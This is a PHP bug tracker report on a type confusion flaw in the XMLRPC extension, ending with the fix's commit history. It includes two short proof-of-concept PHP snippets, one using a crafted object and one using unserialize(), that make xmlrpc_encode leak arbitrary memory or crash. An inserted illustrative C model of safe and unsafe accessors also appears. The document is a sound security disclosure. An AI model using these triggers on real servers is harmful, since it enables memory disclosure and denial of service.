Sec Bug #70728 Type Confusion Vulnerability in PHP_to_XMLRPC_worker()
Submitted: 2015-10-16 16:46 UTC Modified: 2016-01-06 03:18 UTC
From: taoguangchen at icloud dot com Assigned: jpauli (profile)
Status: Closed Package: XMLRPC-EPI related
PHP Version: Irrelevant OS: *
Private report: No CVE-ID: None
 [2015-10-16 16:46 UTC] taoguangchen at icloud dot com
Description:
------------
Type Confusion Vulnerability in PHP_to_XMLRPC_worker()

```c
static XMLRPC_VALUE PHP_to_XMLRPC_worker (const char* key, zval* in_val, int depth TSRMLS_DC)
{
	XMLRPC_VALUE xReturn = NULL;

	if (in_val) {
		zval* val = NULL;
		XMLRPC_VALUE_TYPE type = get_zval_xmlrpc_type(in_val, &val);
	
		if (val) {
			switch (type) {
				case xmlrpc_base64:
					if (Z_TYPE_P(val) == IS_NULL) {
						xReturn = XMLRPC_CreateValueEmpty();
						XMLRPC_SetValueID(xReturn, key, 0);
					} else {
						xReturn = XMLRPC_CreateValueBase64(key, Z_STRVAL_P(val), Z_STRLEN_P(val));
					}
					break;
				case xmlrpc_datetime:
					convert_to_string(val);
					xReturn = XMLRPC_CreateValueDateTime_ISO8601(key, Z_STRVAL_P(val));
					break;
...
XMLRPC_VALUE_TYPE get_zval_xmlrpc_type(zval* value, zval** newvalue) /* {{{ */
{
	XMLRPC_VALUE_TYPE type = xmlrpc_none;
	TSRMLS_FETCH();

	if (value) {
		switch (Z_TYPE_P(value)) {
			...
			case IS_OBJECT:
				{
					zval** attr;
					type = xmlrpc_vector;

					if (zend_hash_find(Z_OBJPROP_P(value), OBJECT_TYPE_ATTR, sizeof(OBJECT_TYPE_ATTR), (void**) &attr) == SUCCESS) {
						if (Z_TYPE_PP(attr) == IS_STRING) {
							type = xmlrpc_str_as_type(Z_STRVAL_PP(attr));
						}
					}
					break;
				}
		}

		/* if requested, return an unmolested (magic removed) copy of the value */
		if (newvalue) {
			zval** val;

			if ((type == xmlrpc_base64 && Z_TYPE_P(value) != IS_NULL) || type == xmlrpc_datetime) {
				if (zend_hash_find(Z_OBJPROP_P(value), OBJECT_VALUE_ATTR, sizeof(OBJECT_VALUE_ATTR), (void**) &val) == SUCCESS) {
					*newvalue = *val;
				}
			} else {
				*newvalue = value;
			}
		}
```

An attacker can control type and val via get_zval_xmlrpc_type() with a crafted object-type ZVAL; the Z_STRVAL_P and Z_STRLEN_P macros then handle a non-string-type val and are able to look up an arbitrary memory address. This results in leaking arbitrary memory blocks, crashing PHP, or other issues.

PoC1:
```php
$obj = new stdClass;
$obj->xmlrpc_type = 'base64';
$obj->scalar = 0x1122334455;
var_dump(xmlrpc_encode($obj));
```

PoC2:
```php
$obj = unserialize('O:8:"stdClass":2:{s:11:"xmlrpc_type";s:6:"base64";s:6:"scalar";R:1;}');
var_dump(xmlrpc_encode($obj));
```
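The root cause is a string accessor applied to a tagged union whose tag is not a string. The following added example (my own code, not the PHP source or the patch attached to this bug) models that with a hypothetical stand-in for the PHP 5 zval: the unsafe accessor reads the string pointer regardless of the tag, so PoC1's integer scalar becomes a raw address, while the hardened accessor checks the tag first and converts non-strings to a fresh string copy before touching string fields. The struct, function names and the conversion strategy are assumptions for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical stand-in for the PHP 5 zval: a payload union plus a type tag.
 * Only the members needed to model this bug are present. */
typedef enum { T_NULL, T_LONG, T_STRING } ztype_t;
typedef struct {
    union {
        long long lval;                        /* integer payload, overlays str.val */
        struct { char *val; size_t len; } str; /* string payload */
    } value;
    ztype_t type;                              /* the tag accessors must respect */
} zv_t;

/* Unsafe pattern from the report: Z_STRVAL_P-style access with no tag check.
 * For a T_LONG value this hands back the integer reinterpreted as a pointer. */
uintptr_t base64_ptr_unsafe(const zv_t *val) {
    return (uintptr_t)val->value.str.val;
}

/* Hardened pattern: read the string members only when the tag says T_STRING;
 * for any other type build a string copy first (like convert_to_string on a
 * duplicate). Returns a malloc'd NUL-terminated buffer, or NULL for T_NULL. */
char *base64_bytes_safe(const zv_t *val, size_t *len) {
    char tmp[32];
    const char *src;
    switch (val->type) {
    case T_STRING:
        src = val->value.str.val; *len = val->value.str.len; break;
    case T_LONG:
        snprintf(tmp, sizeof tmp, "%lld", val->value.lval);
        src = tmp; *len = strlen(tmp); break;
    default:
        *len = 0; return NULL;
    }
    char *out = malloc(*len + 1);
    if (!out) { *len = 0; return NULL; }
    memcpy(out, src, *len);
    out[*len] = '\0';
    return out;
}

/* Constructed input mirroring PoC1: the 'scalar' property is 0x1122334455. */
zv_t poc1_scalar(void) {
    zv_t v; memset(&v, 0, sizeof v);
    v.type = T_LONG;
    v.value.lval = 0x1122334455LL;
    return v;
}
```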


Patches

julien (last revision 2015-12-22 13:21 UTC by jpauli@php.net)

History

 [2015-12-22 13:21 UTC] jpauli@php.net
The following patch has been added/updated:

Patch Name: julien
Revision:   1450790517
URL:        https://bugs.php.net/patch-display.php?bug=70728&patch=julien&revision=1450790517
 [2015-12-22 13:22 UTC] jpauli@php.net
-Status: Open +Status: Assigned -Assigned To: +Assigned To: jpauli
 [2015-12-22 13:22 UTC] jpauli@php.net
I attached a patch.
Could you please try it and report?
 [2015-12-22 13:32 UTC] taoguangchen at icloud dot com
I don't have access to this patch.
 [2015-12-22 15:37 UTC] jpauli@php.net
-Status: Assigned +Status: Feedback
 [2015-12-23 00:29 UTC] taoguangchen at icloud dot com
-Status: Feedback +Status: Assigned
 [2015-12-23 00:29 UTC] taoguangchen at icloud dot com
@jpauli

Hi, I don't have permission to access this patch.
 [2015-12-28 22:23 UTC] stas@php.net
in security repo as 4df84a648ec62b17bd8f8359452f8defd1026167
 [2016-01-06 03:18 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2016-01-06 03:18 UTC] stas@php.net
The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

 For Windows:

http://windows.php.net/snapshots/
 
Thank you for the report, and for helping us make PHP better.


 [2016-01-06 03:38 UTC] stas@php.net
Automatic comment on behalf of jpauli
Revision: http://git.php.net/?p=php-src.git;a=commit;h=4df84a648ec62b17bd8f8359452f8defd1026167
Log: Fixed #70728
 [2016-01-06 06:34 UTC] ab@php.net
Automatic comment on behalf of jpauli
Revision: http://git.php.net/?p=php-src.git;a=commit;h=ef4449a8e822ff6bfee96dbe48a64f6b43dcf040
Log: Fixed #70728
 [2016-01-06 06:34 UTC] ab@php.net
Automatic comment on behalf of jpauli
Revision: http://git.php.net/?p=php-src.git;a=commit;h=4df84a648ec62b17bd8f8359452f8defd1026167
Log: Fixed #70728
 [2016-01-06 06:35 UTC] ab@php.net
Automatic comment on behalf of jpauli
Revision: http://git.php.net/?p=php-src.git;a=commit;h=f3c1863aa2721343245b63ac7bd68cfdc3dd41f3
Log: Fixed #70728
 [2016-02-02 10:36 UTC] korvin1986 at gmail dot com
Hello,
Is there any CVE-ID for this vulnerability?
Or do I have to request it at http://www.cve.mitre.org ?
 [2016-07-20 11:34 UTC] davey@php.net
Automatic comment on behalf of jpauli
Revision: http://git.php.net/?p=php-src.git;a=commit;h=ef4449a8e822ff6bfee96dbe48a64f6b43dcf040
Log: Fixed #70728
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Thu Nov 21 14:01:29 2024 UTC